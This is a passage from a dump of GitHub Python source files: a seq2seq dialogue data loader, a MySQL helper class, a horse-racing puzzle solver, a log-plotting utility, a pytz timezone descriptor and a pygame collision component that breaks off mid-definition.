f_tgt):\n\t\t\t\t\tsrc = src.split(\"[SEP]\")\n\t\t\t\t\ttgt = tgt.split(\"[SEP]\")\n\t\t\t\t\tcheck = f_check.split(\"[SEP]\")\n\t\t\t\t\t\n\n\t\t\t\t\tsrc_tk = tokenizer.tokenize(src[0].strip())\n\t\t\t\t\ttgt_tk = tokenizer.tokenize(tgt[0].strip())\n\t\t\t\t\tcheck_tk = tokenizer.tokenize(check[0].strip())\n\t\t\t\t\tassert len(src_tk) > 0\n\t\t\t\t\tassert len(tgt_tk) > 0\n\t\t\t\t\tassert len(check_tk) > 0\n\n\t\t\t\t\tfor t in range(len(tgt_tk)):\n\t\t\t\t\t\tsrc_tk_list = []\n\t\t\t\t\t\ttgt_tk_list = []\n\t\t\t\t\t\tcheck_tk_list = []\n\n\t\t\t\t\t\tsrc_tk_list.append(src_tk)\n\t\t\t\t\t\ttgt_tk_list.append(tgt_tk[:t+1])\n\t\t\t\t\t\tcheck_tk_list.append(check_tk)\n\n\t\t\t\t\t\tself.ex_list.append((src_tk_list, tgt_tk_list, check_tk_list))\n\t\tprint('Load {0} documents'.format(len(self.ex_list)))\n\n\tdef __len__(self):\n\t\treturn len(self.ex_list)\n\n\tdef __getitem__(self, idx):\n\t\tinstance = self.ex_list[idx]\n\t\tproc = choice(self.bi_uni_pipeline)\n\t\tinstance = proc(instance)\n\t\treturn instance\n\n\tdef __iter__(self): # iterator to load data\n\t\tfor __ in range(math.ceil(len(self.ex_list) / float(self.batch_size))):\n\t\t\tbatch = []\n\t\t\tfor __ in range(self.batch_size):\n\t\t\t\tidx = randint(0, len(self.ex_list) - 1)\n\t\t\t\tbatch.append(self.__getitem__(idx))\n\t\t\t# To Tensor\n\t\t\tyield batch_list_to_batch_tensors(batch)\n\n\nclass C_Preprocess4Seq2seq(Pipeline):\n\t\"\"\" Pre-processing steps for pretraining transformer \"\"\"\n\n\tdef __init__(self, max_pred, mask_prob, vocab_words, indexer, max_len=512, skipgram_prb=0, skipgram_size=0,\n\t\t\t\t block_mask=False, mask_whole_word=False, new_segment_ids=False, truncate_config={},\n\t\t\t\t mask_source_words=False, mode=\"s2s\", has_oracle=False, num_qkv=0, s2s_special_token=False,\n\t\t\t\t s2s_add_segment=False, s2s_share_segment=False, pos_shift=False):\n\t\tsuper().__init__()\n\t\tself.max_len = max_len\n\t\tself.max_pred = max_pred # max tokens of prediction\n\t\tself.mask_prob = mask_prob # masking probability\n\t\tself.vocab_words = vocab_words # vocabulary (sub)words\n\t\tself.indexer = indexer # function from token to token index\n\t\tself.max_len = max_len\n\t\tself._tril_matrix = torch.tril(torch.ones(\n\t\t\t(max_len, max_len), dtype=torch.long))\n\t\tself.skipgram_prb = skipgram_prb\n\t\tself.skipgram_size = skipgram_size\n\t\tself.mask_whole_word = mask_whole_word\n\t\tself.new_segment_ids = new_segment_ids\n\t\tself.always_truncate_tail = truncate_config.get(\n\t\t\t'always_truncate_tail', False)\n\t\tself.max_len_a = truncate_config.get('max_len_a', None)\n\t\tself.max_len_b = truncate_config.get('max_len_b', None)\n\t\tself.trunc_seg = truncate_config.get('trunc_seg', None)\n\t\tself.task_idx = 3 # relax projection layer for different tasks\n\t\tself.mask_source_words = mask_source_words\n\t\tassert mode in (\"s2s\", \"l2r\")\n\t\tself.mode = mode\n\t\tself.has_oracle = has_oracle\n\t\tself.num_qkv = num_qkv\n\t\tself.s2s_special_token = s2s_special_token\n\t\tself.s2s_add_segment = s2s_add_segment\n\t\tself.s2s_share_segment = s2s_share_segment\n\t\tself.pos_shift = pos_shift\n\n\tdef __call__(self, instance):\n\t\tinput_ids_list = []\n\t\tsegment_ids_list = []\n\t\tinput_mask_list = []\n\t\tmasked_ids_list = []\n\t\tmasked_pos_list = []\n\t\tmasked_weights_list = []\n\t\ttgt_pos_list = []\n\t\tlabels_list = []\n\t\tks_labels_list = []\n\t\tcheck_ids_list = []\n\n\t\ttokens_a_list, tokens_b_list, check_list = instance[:3]\n\n\n\t\tfor rank in range(TopK):\n\n\t\t\ttokens_a = tokens_a_list[rank]\n\t\t\ttokens_b = tokens_b_list[rank]\n\t\t\tcheck_tokens = check_list[rank][:self.max_pred]\n\n\t\t\t#######\n\t\t\tcheck_ids = self.indexer(check_tokens)\n\t\t\t# Zero Padding\n\t\t\tcheck_n_pad = self.max_pred - len(check_ids)\n\t\t\tcheck_ids.extend([0] * check_n_pad)\n\t\t\tassert len(check_ids) == self.max_pred\n\t\t\t########\n\n\t\t\ttokens_a = [\".\"] + tokens_a[:-1]\n\n\t\t\tlabels = torch.tensor(0.1)\n\t\t\tks_labels = torch.tensor(1)\n\t\t\ttokens_b = tokens_b\n\n\n\t\t\tif self.pos_shift:\n\t\t\t\ttokens_b = ['[S2S_SOS]'] + tokens_b\n\n\t\t\t# -3 for special tokens [CLS], [SEP], [SEP]\n\t\t\tnum_truncated_a, _ = truncate_tokens_pair(tokens_a, tokens_b, self.max_len - 3, max_len_a=self.max_len_a,\n\t\t\t\t\t\t\t\t\t\t\t\t\t max_len_b=self.max_len_b, trunc_seg=self.trunc_seg,\n\t\t\t\t\t\t\t\t\t\t\t\t\t always_truncate_tail=self.always_truncate_tail)\n\n\t\t\t#process tokens_a all_len == 213; tokens_b max len = 40\n\t\t\ttokens_a = tokens_a[:213]\n\t\t\twhile len(tokens_a) < 213:\n\t\t\t\ttokens_a.extend([\"[PAD]\"])\n\t\t\ttokens_b = tokens_b[:40]\n\n\n\t\t\t# Add Special Tokens\n\t\t\tif self.s2s_special_token:\n\t\t\t\ttokens = ['[S2S_CLS]'] + tokens_a + \\\n\t\t\t\t\t\t ['[S2S_SEP]'] + tokens_b + ['[SEP]']\n\t\t\telse:\n\t\t\t\ttokens = ['[CLS]'] + tokens_a + ['[SEP]'] + tokens_b + ['[SEP]']\n\n\t\t\tif self.new_segment_ids:\n\t\t\t\tif self.mode == \"s2s\":\n\t\t\t\t\tif self.s2s_add_segment:\n\t\t\t\t\t\tif self.s2s_share_segment:\n\t\t\t\t\t\t\tsegment_ids = [0] + [1] * \\\n\t\t\t\t\t\t\t\t\t\t (len(tokens_a) + 1) + [5] * (len(tokens_b) + 1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsegment_ids = [4] + [6] * \\\n\t\t\t\t\t\t\t\t\t\t (len(tokens_a) + 1) + [5] * (len(tokens_b) + 1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tsegment_ids = [4] * (len(tokens_a) + 2) + \\\n\t\t\t\t\t\t\t\t\t [5] * (len(tokens_b) + 1)\n\t\t\t\telse:\n\t\t\t\t\tsegment_ids = [2] * (len(tokens))\n\t\t\telse:\n\t\t\t\tsegment_ids = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n\n\t\t\tif self.pos_shift:\n\t\t\t\tn_pred = min(self.max_pred, len(tokens_b))\n\t\t\t\tmasked_pos = [len(tokens_a) + 2 + i for i in range(len(tokens_b))]\n\t\t\t\tmasked_weights = [1] * n_pred\n\t\t\t\tmasked_ids = self.indexer(tokens_b[1:] + ['[SEP]'])\n\t\t\telse:\n\t\t\t\t# For masked Language Models\n\t\t\t\t# the number of prediction is sometimes less than max_pred when sequence is short\n\t\t\t\teffective_length = len(tokens_b)\n\t\t\t\tif self.mask_source_words:\n\t\t\t\t\teffective_length += len(tokens_a)\n\t\t\t\tn_pred = min(self.max_pred, max(\n\t\t\t\t\t1, int(round(effective_length * self.mask_prob))))\n\n\t\t\t\t# candidate positions of masked tokens\n\t\t\t\tcand_pos = []\n\t\t\t\tspecial_pos = set()\n\t\t\t\tfor i, tk in enumerate(tokens):\n\t\t\t\t\t# only mask tokens_b (target sequence)\n\t\t\t\t\t# we will mask [SEP] as an ending symbol\n\t\t\t\t\tif (i >= len(tokens_a) + 2) and (tk != '[CLS]'):\n\t\t\t\t\t\tcand_pos.append(i)\n\t\t\t\t\telif self.mask_source_words and (i < len(tokens_a) + 2) and (tk != '[CLS]') and (\n\t\t\t\t\tnot tk.startswith('[SEP')):\n\t\t\t\t\t\tcand_pos.append(i)\n\t\t\t\t\telse:\n\t\t\t\t\t\tspecial_pos.add(i)\n\t\t\t\tmax_cand_pos = max(cand_pos)\n\n\t\t\t\tmasked_pos = list([max_cand_pos-1])\n\t\t\t\tif len(masked_pos) > n_pred:\n\t\t\t\t\tshuffle(masked_pos)\n\t\t\t\t\tmasked_pos = masked_pos[:n_pred]\n\n\t\t\t\tmasked_tokens = [tokens[pos] for pos in masked_pos]\n\t\t\t\tfor pos in masked_pos:\n\t\t\t\t\tif rand() < 0.8: # 80%\n\t\t\t\t\t\ttokens[pos] = '[MASK]'\n\t\t\t\t\telif rand() < 0.5: # 10%\n\t\t\t\t\t\ttokens[pos] = get_random_word(self.vocab_words)\n\t\t\t\t# when n_pred < max_pred, we only calculate loss within n_pred\n\t\t\t\tmasked_weights = [1] * len(masked_tokens)\n\n\t\t\t\t# Token Indexing\n\t\t\t\tmasked_ids = self.indexer(masked_tokens)\n\t\t\t# Token Indexing\n\t\t\tinput_ids = self.indexer(tokens)\n\n\t\t\t# Zero Padding\n\t\t\tn_pad = self.max_len - len(input_ids)\n\t\t\tinput_ids.extend([0] * n_pad)\n\t\t\tsegment_ids.extend([0] * n_pad)\n\n\t\t\tif self.num_qkv > 1:\n\t\t\t\tmask_qkv = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n\t\t\t\tmask_qkv.extend([0] * n_pad)\n\t\t\telse:\n\t\t\t\tmask_qkv = None\n\n\t\t\tinput_mask = torch.zeros(self.max_len, self.max_len, dtype=torch.long)\n\t\t\tif self.mode == \"s2s\":\n\t\t\t\tinput_mask[:, :len(tokens_a) + 2].fill_(1)\n\t\t\t\tsecond_st, second_end = len(\n\t\t\t\t\ttokens_a) + 2, len(tokens_a) + len(tokens_b) + 3\n\t\t\t\tinput_mask[second_st:second_end, second_st:second_end].copy_(\n\t\t\t\t\tself._tril_matrix[:second_end - second_st, :second_end - second_st])\n\t\t\telse:\n\t\t\t\tst, end = 0, len(tokens_a) + len(tokens_b) + 3\n\t\t\t\tinput_mask[st:end, st:end].copy_(self._tril_matrix[:end, :end])\n\n\t\t\t# Zero Padding for masked target\n\t\t\tif self.max_pred > n_pred:\n\t\t\t\tn_pad = self.max_pred - n_pred\n\t\t\t\tif masked_ids is not None:\n\t\t\t\t\tmasked_ids.extend([0] * n_pad)\n\t\t\t\tif masked_pos is not None:\n\t\t\t\t\tmasked_pos.extend([0] * n_pad)\n\t\t\t\tif masked_weights is not None:\n\t\t\t\t\tmasked_weights.extend([0] * n_pad)\n\n\t\t\ttgt_pos = []\n\t\t\tfor i, tk in enumerate(tokens):\n\t\t\t\tif (i >= len(tokens_a) + 2) and (tk != '[CLS]' and tk != '[SEP]'):\n\t\t\t\t\ttgt_pos.append(i)\n\n\t\t\ttgt_pos = tgt_pos[:len(masked_pos)]\n\t\t\ttgt_pad = len(masked_pos) - len(tgt_pos)\n\t\t\ttgt_pos.extend([0] * tgt_pad)\n\n\t\t\tinput_ids_list.append(input_ids)\n\t\t\tsegment_ids_list.append(segment_ids)\n\t\t\tinput_mask_list.append(input_mask)\n\t\t\tmasked_ids_list.append(masked_ids)\n\t\t\tmasked_pos_list.append(masked_pos)\n\t\t\tmasked_weights_list.append(masked_weights)\n\t\t\ttgt_pos_list.append(tgt_pos)\n\t\t\tlabels_list.append(labels)\n\t\t\tks_labels_list.append(ks_labels)\n\t\t\tcheck_ids_list.append(check_ids)\n\n\n\t\tinput_mask_list = torch.stack(input_mask_list)\n\t\tlabels_list = torch.stack(labels_list)\n\t\tks_labels_list = torch.stack(ks_labels_list)\n\n\t\treturn (input_ids_list, segment_ids_list, input_mask_list, mask_qkv, masked_ids_list, masked_pos_list, masked_weights_list, -1, self.task_idx,\n\t\t\t\ttgt_pos_list, labels_list, ks_labels_list, check_ids_list)\n\n\n","repo_name":"nlpxucan/ZRKGC","sub_path":"ZRKGC/PPL/PPL_loader.py","file_name":"PPL_loader.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"12131035018","text":"import MySQLdb\nimport pprint\n\nclass Cnect_Database(object):\n def __init__(self,ip,user,db,charset):\n self.ip = ip\n self.user = user\n self.db = db\n self.charset = charset\n\n def connect(self,ps):\n # 连接数据库,获取游标\n self.dadabase = MySQLdb.connect(self.ip,self.user, ps, self.db, charset=self.charset )\n self.cursor = self.dadabase.cursor()\n # 获取数据库版本信息,打印\n self.cursor.execute(\"SELECT VERSION()\")\n data = self.cursor.fetchone()\n print(\"Database version : %s \" % data)\n\n def register(self,data,namelist,tablename,yearspan):\n # 如果数据表已经存在,删除表。\n self.cursor.execute(\"DROP TABLE IF EXISTS \"+tablename)\n\n # 建表前准备\n creatlist = namelist.copy()\n for i,ele in enumerate(creatlist):\n if ele == 'year':\n creatlist[i] = ele+' YEAR NOT NULL'\n else:\n creatlist[i] = ele + ' FLOAT'\n # print(ele)\n # 创建数据表SQL语句\n sql = \"CREATE TABLE \"+tablename+\" \"+str(tuple(creatlist)).replace(\"'\",'')\n print(sql)\n try:\n # 执行sql语句\n self.cursor.execute(sql)\n # 提交到数据库执行\n self.dadabase.commit()\n except:\n # Rollback in case there is any error\n self.dadabase.rollback()\n\n # 插入的预处理\n vallist = namelist.copy()\n for i,ele in enumerate(vallist):\n # print(ele)\n if ele == 'year':\n vallist[i] = '2018-index'\n else:\n vallist[i] = 'data['+str(i)+'][index]'\n # 2018-index,eval('total')[index],man[index],woman[index],city[index], countryside[index]\n # SQL 插入语句\n # print(vallist)\n for index in list(range(0,yearspan)):\n sql = \"INSERT INTO \"+tablename+str(tuple(namelist)).replace(\"'\",'')+\" VALUES {}\".format(str(tuple(map(eval,vallist))))\n print(sql)\n try:\n # 执行sql语句\n self.cursor.execute(sql)\n # 提交到数据库执行\n self.dadabase.commit()\n # print('s')\n except:\n # Rollback in case there is any error\n self.dadabase.rollback()\n\n self.dadabase.close()\n\n def retrieval(self,itemlist,tablename):\n if itemlist == '*':\n sql = \"select * from \"+tablename\n else:\n sql = \"select \"+str(itemlist).replace(\"'\",'').strip('[]')+\" from \"+tablename\n print(sql)\n self.cursor.execute(sql)\n result = self.cursor.fetchall()\n # pprint.pprint(result)\n self.dadabase.close()\n return result\n\n ","repo_name":"KiritoHugh/Nation_statistic_crawler","sub_path":"Connect_database.py","file_name":"Connect_database.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37273418785","text":"# 田忌赛马问题\n# 田忌与齐王赛马,双方各有n匹马参赛(n<=100),每场比赛赌注为1两黄金,现已知齐王与田忌的每匹马的速度,并且齐王肯定是按马的速度从快到慢出场,现要你写一个程序帮助田忌计算他最好的结果是赢多少两黄金\n\n# solver1\n# 动态规划\n# f[i][j] 表示田忌在经过i场比赛后,使用了从慢到快的j匹慢马所达到的最大收益,则有\n# f[i][j] = max{ f[i-1][j] + score(i-j,j), f[i-1][j-1]+score(n-j+1,j) }\n# 其中score(x,y)表示田忌的第x匹马与齐王的第y匹马比赛所能获得的分数\n\ndef get_gold_by_one_race(horse_tian,horse_qi):\n return 1 if horse_tian > horse_qi else (-1 if horse_tian < horse_qi else 0)\n\ndef get_max_golds(horses_tian,horses_qi):\n horses_tian.sort(reverse=True)\n horses_qi.sort(reverse=True)\n\n max_golds = []\n # initailization, only one race\n max_golds.append([])\n max_golds[-1].append(get_gold_by_one_race(horses_tian[0],horses_qi[0])) # not use slow horse\n max_golds[-1].append(get_gold_by_one_race(horses_tian[-1],horses_qi[0])) # use slow horse\n\n # dp\n for race_num in range(2,len(horses_tian)+1):\n max_golds.append([])\n # slow_horse_num = 0\n max_golds[-1].append(max_golds[-2][0]+get_gold_by_one_race(horses_tian[race_num-1],horses_qi[race_num-1]))\n # 0 < slow_horse_num < race_num\n for slow_horse_num in range(1,race_num):\n max_golds[-1].append(\n max(max_golds[-2][slow_horse_num]+get_gold_by_one_race(horses_tian[race_num-slow_horse_num-1],horses_qi[race_num-1]),\n max_golds[-2][slow_horse_num-1]+get_gold_by_one_race(horses_tian[-slow_horse_num],horses_qi[race_num-1])))\n # slow_horse_num = race_num\n max_golds[-1].append(max_golds[-2][race_num-1]+get_gold_by_one_race(horses_tian[-race_num],horses_qi[race_num-1])) # slow_horse_num = race_num\n\n return max(max_golds[-1])\n\n# solver2\n# 贪心算法\n# 1. 如果田忌最慢的马能赢齐王最慢的马,则先赢一局\n# 2. 田忌最慢的马比齐王最慢的马慢,则和齐王最快的马比,先输一场\n# 3. 田忌最慢的马和齐王最慢的马相等\n# 1. 田忌最快的马比齐王最快的马快,先赢一场\n# 2. 田忌最快的马和齐王最快的马慢,拿最慢的马和齐王最快的马比\n# 3. 田忌最快的马和齐王最快的马相等,拿最慢的马和齐王最快的马比\n\nfrom collections import deque\n\ndef get_max_golds2(horses_tian,horses_qi):\n horses_tian.sort()\n horses_qi.sort()\n horses_tian = deque(horses_tian)\n horses_qi = deque(horses_qi)\n\n max_scores = 0\n while(len(horses_tian) > 0):\n if horses_tian[0] > horses_qi[0]:\n max_scores += 1\n horses_tian.popleft()\n horses_qi.popleft()\n elif horses_tian[0] < horses_qi[0]:\n max_scores -= 1\n horses_tian.popleft()\n horses_qi.pop()\n else:\n if horses_tian[-1] > horses_qi[-1]:\n max_scores += 1\n horses_tian.pop()\n horses_qi.pop()\n elif horses_tian[-1] < horses_qi[-1]:\n max_scores -= 1\n horses_tian.popleft()\n horses_qi.pop()\n else:\n if horses_tian[0] < horses_qi[-1]:\n max_scores -= 1\n elif horses_tian[0] > horses_qi[-1]:\n max_scores += 1\n horses_tian.popleft()\n horses_qi.pop()\n\n return max_scores\n\n\n\nif __name__ == \"__main__\":\n horses_tian = [1,2,3,4]\n horses_qi = [2,4,4,6]\n print(get_max_golds2(horses_tian,horses_qi))\n","repo_name":"xtudbxk/practice","sub_path":"python/policy-horse_race.py","file_name":"policy-horse_race.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1483224158","text":"import torch, os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom get_logger import logger\r\n\r\ndef plot_logs(log, fields=(\"loss\", \"loss_ce\", \"loss_bbox\", \"loss_giou\"), log_name=\"log.txt\", ewm_col=1):\r\n func_name = \"plot_utils.py::plot_logs\"\r\n assert os.path.isdir(log), f\"{func_name} - log must be a dir...\"\r\n if not os.path.exists(log):\r\n raise ValueError(f\"{func_name} - logs not exist...\")\r\n\r\n df = pd.read_json(os.path.join(log, log_name), lines=True)\r\n fig, axs = plt.subplots(1, len(fields), figsize=(16, 5))\r\n\r\n for df, color in zip([df], sns.color_palette(n_colors=1)):\r\n for j, field in enumerate(fields):\r\n df.interpolate().ewm(com=ewm_col).mean().plot(\r\n y=[f\"train_{field}\", f\"test_{field}\"],\r\n ax=axs[j],\r\n color=[color] * 2,\r\n style=[\"-\", \"--\"]\r\n )\r\n for ax, field in zip(axs, fields):\r\n ax.legend([f\"train_{field}\", f\"test_{field}\"])\r\n ax.set_title(field)\r\n ax.set_xlabel(\"Epoch\")\r\n log_name = log_name.split(\".\")[0]\r\n logpath = os.path.join(log, f\"{log_name}.png\")\r\n plt.savefig(logpath, dpi=300, bbox_inches=\"tight\")\r\n logger.info(f\"log figure is saved in {logpath}...\")\r\n\r\nif __name__ == \"__main__\":\r\n log = \"D:\\\\Desktop\\\\ECG分类研究\\\\code\\\\outputs\"\r\n plot_logs(log, log_name=\"log01.txt\")\r\n","repo_name":"Anais-Y/Emotion-Recognition-with-4DRCNN-and-DGCNN_LSTM","sub_path":"utils/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38389564350","text":"from inspect import getmro\nfrom datetime import datetime, timedelta\nfrom time import mktime\n\nfrom pytzpure.random_utility.get_as_python import get_as_python\n\nfrom pytzpure.config import DEFAULT_TZ_MODULE_PREFIX\nfrom pytzpure.loader import load_module\n\n\nclass TzDescriptor(object):\n def __init__(self, zone_name, parent_class_name, \n utc_transition_times_list=None, transition_info_list=None, \n utcoffset=None, tzname=None):\n\n self.__zone_name = zone_name\n self.__parent_class_name = parent_class_name\n self.__utc_transition_times_list = utc_transition_times_list\n self.__transition_info_list = transition_info_list\n self.__utcoffset = utcoffset\n self.__tzname = tzname\n\n def __str__(self):\n return ('<%s>' % (self.__zone_name))\n\n @classmethod\n def load_from_file(cls, zone_name, module_prefix=DEFAULT_TZ_MODULE_PREFIX):\n module = load_module(zone_name, module_prefix)\n\n return cls(zone_name, module.parent_class_name, \n module.utc_transition_times_list, \n module.transition_info_list, module.utcoffset, \n module.tzname)\n\n @classmethod\n def create_from_pytz(cls, tz_info):\n \"\"\"Create an instance using the result of the timezone() call in \n \"pytz\".\n \"\"\"\n\n zone_name = tz_info.zone\n\n utc_transition_times_list_raw = getattr(tz_info, \n '_utc_transition_times', \n None)\n\n utc_transition_times_list = [tuple(utt.timetuple()) \n for utt \n in utc_transition_times_list_raw] \\\n if utc_transition_times_list_raw is not None \\\n else None\n \n transition_info_list_raw = getattr(tz_info, \n '_transition_info', \n None)\n\n transition_info_list = [(utcoffset_td.total_seconds(), \n dst_td.total_seconds(), \n tzname)\n for (utcoffset_td, dst_td, tzname)\n in transition_info_list_raw] \\\n if transition_info_list_raw is not None \\\n else None\n\n try:\n utcoffset_dt = tz_info._utcoffset\n except AttributeError:\n utcoffset = None\n else:\n utcoffset = utcoffset_dt.total_seconds()\n\n tzname = getattr(tz_info, '_tzname', None)\n\n parent_class_name = getmro(tz_info.__class__)[1].__name__\n return cls(zone_name, parent_class_name, utc_transition_times_list, \n transition_info_list, utcoffset, tzname)\n\n @property\n def zone_name(self):\n return self.__zone_name\n\n @property\n def parent_class_name(self):\n return self.__parent_class_name\n \n @property\n def utc_transition_times_list(self):\n return self.__utc_transition_times_list\n \n @property\n def utc_transition_times_list_formal(self):\n try:\n return self.__uttl\n except AttributeError:\n def translate(dt_tuple): \n return datetime.utcfromtimestamp(mktime(dt_tuple))\n\n self.__uttl = [translate(tuple(dt_tuple)) \\\n for dt_tuple \\\n in self.__utc_transition_times_list]\n \n return self.__uttl\n \n @property\n def transition_info_list_formal(self):\n try:\n return self.__til\n except AttributeError:\n self.__til = [(timedelta(seconds=utcoffset_seconds), \n timedelta(seconds=dst_seconds), \n tzname) \n for (utcoffset_seconds, dst_seconds, tzname) \n in self.__transition_info_list]\n\n return self.__til\n\n @property\n def utcoffset(self):\n return self.__utcoffset\n \n @property\n def utcoffset_formal(self):\n return timedelta(seconds=self.__utcoffset) \\\n if self.__utcoffset is not None \\\n else None\n \n @property\n def tzname(self):\n return self.__tzname\n\n @property\n def as_python(self):\n try:\n return self.__python\n except AttributeError:\n data = { 'zone_name': self.__zone_name,\n 'parent_class_name': self.__parent_class_name,\n 'utc_transition_times_list': self.__utc_transition_times_list,\n 'transition_info_list': self.__transition_info_list,\n 'utcoffset': self.__utcoffset,\n 'tzname': self.__tzname }\n\n self.__python = get_as_python(data)\n return self.__python\n\n","repo_name":"dsoprea/pytzPure","sub_path":"pytzpure/tz_descriptor.py","file_name":"tz_descriptor.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12503360608","text":"from src.WorldConstants import *\nimport src.Util\nimport pygame\n\nclass BlockCollision:\n def __init__(self, pos, level):\n self.x = pos[0]\n self.y = pos[1]\n self.level = level\n\nclass MovingComponent:\n #obj must have a .sprite member\n def __init__(self, obj, level):\n self.obj = obj\n self.level = level\n\n self.position = (0, 0)\n self.velocity = (0, 0)\n self.acceleration = (0,0)\n self.sprite = obj.sprite\n self.size = (BLOCK_SIZE, BLOCK_SIZE)\n\n self.tiles = level.tiles\n self.tiles_col = level.col\n self.tiles_row = level.row\n\n self.in_air = False\n self.gravity = CONST_GRAVITY\n\n self.collides_with_tiles = True\n self.collides_with_entities = True\n self.collision_bounds = pygame.Rect(1,1,30,30)\n self.bounciness = 0\n\n def passfunc(obj1, obj2):\n pass\n\n self.on_collision = passfunc\n\n def point_in_wall(self,x,y):\n return self.level.point_in_wall((x,y))\n\n def push_out_colliders(self, colliders):\n magnitude = 0\n flag = 0\n factor = 1\n from src.Projectile import Projectile\n\n if isinstance(self.obj,Projectile):\n print(colliders)\n\n colliding_obj = None\n while flag == 0:\n my_sprite = self.sprite.sprite_rect()\n for i in range(2 * magnitude + 2):\n if flag == 1:\n break\n for j in range(2 * magnitude + 2):\n if flag==1:\n break\n\n d = (factor * (int(i / 2) * ((-1) ** (i % 2))), factor * (int(j / 2) * ((-1) ** (j % 2))))\n\n #if d[0] is not m and d[1] is not m:\n # continue\n\n b = False\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1])\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1])\n\n if b and colliding_obj is None:\n #(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3])\n\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3])\n\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3]), self.level)\n\n if b == False:\n for k in range(len(colliders)):\n new_rect = pygame.Rect(my_sprite.topleft[0]+d[0]+self.collision_bounds[0],\n my_sprite.topleft[1]+d[1]+self.collision_bounds[1],\n self.collision_bounds[2], self.collision_bounds[3])\n b = b or new_rect.colliderect(colliders[k].sprite.sprite_rect())\n #b = b or src.Util.rect_intersect(new_rect, colliders[k].sprite.sprite_rect())\n if b:\n from src.Projectile import Projectile\n if type(self.obj)==Projectile:\n print(\"colliding:\")\n print(self.obj)\n print(colliders[k])\n if colliding_obj is None:\n print(\"setting collider\")\n colliding_obj = colliders[k]\n break\n\n from src.Skeleton import Skeleton\n\n if b == False:\n self.move(d)\n flag = 1\n debug = 0\n if (d[0] != 0):\n self.velocity = (-self.velocity[0] * self.bounciness, self.velocity[1])\n if type(self.obj)==Skeleton:\n print(\"set vel\")\n print(\"p1\")\n print(colliding_obj)\n debug = 1\n assert magnitude > 0\n assert colliding_obj is not None\n\n if (d[1] != 0):\n self.velocity = (self.velocity[0], -self.velocity[1] * self.bounciness)\n #print(\"set vel\")\n assert magnitude > 0\n assert colliding_obj is not None\n\n assert colliding_obj is not None or magnitude == 0\n if debug>0:\n if type(self.obj) == Skeleton:\n print(\"p2\")\n print(colliding_obj)\n if colliding_obj is not None:\n self.on_collision(self.obj, colliding_obj)\n if debug > 0 and type(self.obj)==Skeleton:\n print(\"called collision\")\n elif debug > 0 and type(self.obj)==Skeleton:\n print(\"not called collision\")\n break\n\n magnitude += int(magnitude/10) + 1\n\n def snap_out(self):\n m = 0\n flag = 0\n factor = 1\n while flag==0:\n for i in range(2*m+1):\n if flag==1:\n break\n for j in range(2*m+1):\n d = (factor*(int(i/2)*((-1)**(i%2))),factor*(int(j/2)*((-1)**(j%2))))\n\n #if d[0] is not m and d[1] is not m:\n # continue\n\n b = False\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] +1,self.sprite.sprite_rect().topleft[1] + d[1] +1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().topright[0] + d[0] -1,self.sprite.sprite_rect().topright[1] + d[1] +1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().bottomleft[0] + d[0] +1,self.sprite.sprite_rect().bottomleft[1] + d[1] -1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().bottomright[0] + d[0] -1,self.sprite.sprite_rect().bottomright[1] + d[1] -1)\n\n if b == False:\n self.move(d)\n if (d[0] != 0):\n self.velocity = (-self.velocity[0]*self.bounciness, self.velocity[1])\n if (d[1] != 0):\n self.velocity = (self.velocity[0], -self.velocity[1]*self.bounciness)\n #print(m)\n flag=1\n break\n m += 1\n\n def move(self, 